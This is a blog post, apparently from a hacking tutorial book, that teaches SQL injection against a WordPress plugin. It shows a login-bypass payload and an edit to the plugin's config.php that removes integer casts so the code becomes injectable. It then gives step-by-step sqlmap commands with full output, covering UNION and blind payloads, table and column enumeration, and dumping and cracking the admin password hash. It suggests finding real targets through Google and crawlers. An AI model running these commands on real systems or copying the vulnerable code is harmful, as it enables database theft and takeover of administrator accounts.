SQL
Injection attacks can be conducted by inserting abnormal SQL code into a
vulnerable application for the program to run abnormally. This form of attack
is mainly carried out by inserting the hacking code into a variable that
receives and processes user input.
•
General User Authentication Code
$query = “SELECT * FROM USER WHERE
ID=$id and PWD=$pwd”
$result =
mysql_query($query, $connect)
|
•
SQL Injection CodeUsers
typically log in using their username and password. If the user uses the
correct username and password, the Web server successfully completes the
authentication process. Let’s enter abnormal SQL Code into the “id” field to
perform a SQL Injection.
1 OR 1=1 --
|
If the
above code is entered in the “id” field, the normal SQL statement changes as follows.
•
Modified SQL Statement
SELECT * FROM USER WHERE ID=1 OR 1=1 -- and
PWD=$pwd
|
If you
enter “ID = 1 OR 1 = 1” to a conditional statement, the database will print all
information related to users. The password is commented with “--”. Therefore,
the SQL statement that handles user authentication is disabled. To complete a
successful SQL Injection, it is necessary to enter various values, and these repetitive tasks can be automated by
writing a program.
Python provides a variety of modules that can automate these tasks, with sqlmap
as the representative case.
Now,
let's install sqlmap. Download the zip file by connecting to http://sqlmap.org. Unzip the
file to the directory (C:\Python27\sqlmap). This file does not require a
special installation process, but it is instead sufficient to simply run the
“sqlmap.py” file in that directory.
8-1 sqlmap.org
In terms of the WordPress
site, secure coding practices have been properly implemented, so it is
difficult to hack directly. In order to test the hacking tools, you must
install a relatively vulnerable plugin. You can find a variety of plugins in
the WordPress website.
In order to conduct the test,
let’s download one video-related plugin. A hacker recently released a security
vulnerability in this plug-in not long ago, and although security patches have
been applied, simple code can be executed to make this plugin ready for
hacking.
The installation can be
completed by simply copying the file that has been downloaded to the “wordpress\wp-content\plugins”
directory on the server PC and unzipping the file. Then open the file (wordpress\wp-content\plugins\all-video-gallery\config.php)
to modify the code. This file is a part of a program that provides an
environment display function.
/*$_vid
= (int) $_GET['vid']; */
[original code] comment out
/*$_pid
= (int) $_GET['pid'];*/ [original code] comment out
$_vid
= $_GET['vid']; [modified code] remove “(int)”
$_pid
= $_GET['pid']; [modified code] remove “(int)”
|
In order to use sqlmap, you
should be familiar with its various options. The easiest way to do this is to
try to follow examples that can be found on the Internet. Please read the
sqlmap description document after having used the software for some time
because this will make it possible to understand the document more easily. Let's
then proceed with hacking by using sqlmap with the following process.
8-3 SQL Injection Process
With
sqlmap, hacking proceeds step by step. The Web site is analyzed to find
vulnerabilities one by one starting from simple information. A SQL Injection
attack is usually performed by following the five steps below.
(1) Searching URL: A SQL
Injection attack hacks the system on the basis of the URL. It mainly attacks
the GET function, which sends user input placed after the URL. You can easily
search for the target URL using Google. Various pages can be opened to observe
the change in the URL. At this time, some knowledge of HTML and JavaScript is
useful.
(2) Vulnerability Detection: The “sqlmap.py” program can
be used to detect vulnerabilities in the URL. Since SQL Injection Protection
Code has been applied to most of web programs, the vulnerabilities require many
URLs to be collected. URLs to detect vulnerabilities can be collected by using
automated tools, such as a Web crawler. A web crawler receives the source code
for the web site, and extracts the corresponding URLs.
(3) Searching Table: If vulnerabilities are
detected in the URL, the hacker can search the tables in the database by utilizing
sqlmap. The name of the table can provide important information.
(4) Searching Column: First, select the table and
search for the column contained therein. The column name is made to reflect the
characteristics of the data. Therefore, it is possible to easily find a column
that has important information.
(5) Searching Data: Select a column to query the
data contained therein. If the data is encrypted, sqlmap can use dictionary
attack techniques to decrypt the data.
You
can use a Web crawler, so let's assume you have found a vulnerable URL. The
vulnerable URL is a “config.php” that provides environmental information of the
WordPress plugin. Let's then detect vulnerabilities in that URL. Execute the program in
the command prompt, and move to the "C:\Python27\sqlmap" directory.
Then enter the following command
C:\Python27\python
sqlmap.py -u
"http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1"
--level 3 --risk 3 --dbms mysql
|
There
are a variety of options in sqlmap. First, let's take a look at some of the
options that are used here. The “[-u]” option indicates the URL that is to be
tested, and the “[--level]” option indicates the level of testing that is to be
carried out.
[ level option ]
0:
Show only Python tracebacks, error and critical messages.
1:
Show also information and warning messages.
2:
Show also debug messages.
3:
Show also payloads injected.
4:
Show also HTTP requests.
5:
Show also HTTP responses' headers.
6:
Show also HTTP responses' page content.
|
The
“[--risk]” option assigns the risk level. If the risk level is high, the test
there has a high probability of causing a problem on the site.
[ risk option ]
1:
This is innocuous for the majority of SQL injection points. Default value.
Normal
Injection(union), Blind Injection(true:1=1, false:1=2)
2:
Add to the default level the tests for heavy query time-based SQL injections.
3:
Adds also OR-based SQL injection tests.
|
The
“[--dbms]” option assigns the database type. If you don't use that option,
sqlmap runs the test against all kinds of databases. The database type is
specified by mysql for convenience. If you are asked for the test to proceed,
enter "y".
[11:09:53]
[WARNING] User-Agent parameter 'User-Agent' is not injectable
sqlmap
identified the following injection points with a total of 5830 HTTP(s)
requests:
---
Place: GET
Parameter: vid
Type: UNION query
Title: MySQL UNION query (random number)
- 18 columns
Payload: vid=1 UNION ALL SELECT
9655,9655,9655,9655,9655,CONCAT(0x71657a7571,0x41596a4a4a6f68716454,0x716f747471),96
55,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655#&pid=1
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based
blind (heavy query)
Payload: vid=1 AND
9762=BENCHMARK(5000000,MD5(0x6a537868))-- pOPC&pid=1
Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or
HAVING clause
Payload: vid=1&pid=1 AND 4391=4391
Type: UNION query
Title: MySQL UNION query (NULL) - 41
columns
Payload: vid=1&pid=-2499 UNION ALL
SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71657a7571,0x71764d467a5
352664d77,0x716f747471),NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based
blind
Payload: vid=1&pid=1 AND SLEEP(5)
---
there were
multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: vid, type:
Unescaped numeric (default)
[1] place: GET, parameter: pid, type:
Unescaped numeric
|
Vulnerabilities
have been discovered in "vid" and "pid". While changing the
values that have been entered for both variables, let's find a few more
details of the information. You can now use the vulnerability to retrieve a
table in the database.
C:\Python27\python
sqlmap.py -u
"http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1"
--level 3 --risk 3 --dbms mysql --tables
|
“[--tables]”
can be used to obtain all table lists. By adding this option, you can read all
the information of all the tables in the database. Let's manually find a table
that contains user information.
there were multiple injection points,
please select the one to use for following injections:
[0] place: GET,
parameter: pid, type: Unescaped numeric (default)
[1] place: GET,
parameter: vid, type: Unescaped numeric
[q] Quit
> 0
Database: phpmyadmin
[8 tables]
+------------------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_relation |
| pma_table_coords |
| pma_table_info |
+------------------------------------------------+
Database: wordpress
[16 tables]
+------------------------------------------------+
| prg_connect_config |
| prg_connect_sent |
| wp_allvideogallery_categories |
| wp_allvideogallery_profiles |
| wp_allvideogallery_videos |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+------------------------------------------------+
|
8-7 Searching Table Result
When asked for which
arguments to use to hack in the middle, enter "0". When manually
browsing the list of tables, the "wp_users" table is likely to be the
table that contains user information. If the table selection is wrong, you can
choose a different table. Now, you can extract the list of columns in the table.
C:\Python27\python
sqlmap.py -u
"http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1"
--level 3 --risk 3 --dbms mysql -T wp_users --columns
|
The
“[-T]” option is used to select a table, and the “[--columns]” option is also used
to select a column. In general, the characteristics of the data are reflected
when the name of the column is set. A hacker is therefore able to check the
column name and find relevant columns.
Database: wordpress
Table: wp_users
[10 columns]
+-----------------------------+----------------------+
| Column | Type |
+-----------------------------+----------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+-----------------------------+----------------------+
|
Let's
now take a look at the list of columns that has been retrieved. The "user_login"
and "user_pass" columns store the user ID and password, respectively.
By obtaining only these columns of information, the site can be successfully
hacked. Let's extract the login information.
C:\Python27\python
sqlmap.py -u
"http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1"
--level 3 --risk 3 --dbms mysql -T wp_users --columns -C user_login,user_pass
–dump
|
The
“[-C]” option is used to select a column. Multiple columns can be specified by
separating them with commas. The “[--dump]” option is then used to extract all of
the data that is stored in that column.
do you want to store hashes to a temporary file for eventual
further processing with other tools [y/N] y
do you want to crack them via a dictionary-based attack? [Y/n/q] y
Database: wordpress
Table: wp_users
[1 entry]
+---------------------------------------------+----------------------+
| user_pass | user_login |
+---------------------------------------------+----------------------+
| $P$BfKYXQB9dz5b6BJl0F6qy6lRG1bRai0 (python) | python |
+---------------------------------------------+----------------------+
|
8-11 Data Extraction Result
You
will receive two questions during this process. One is whether to store the
hash data, and the other is whether to decrypt the hash data. Set all to "y".
The tool provided by sqlmap can then be used to decode the encrypted password.
Both the extracted ID and password results are the values that were entered
during program installation. Now, you have the administrator account.
No comments:
Post a Comment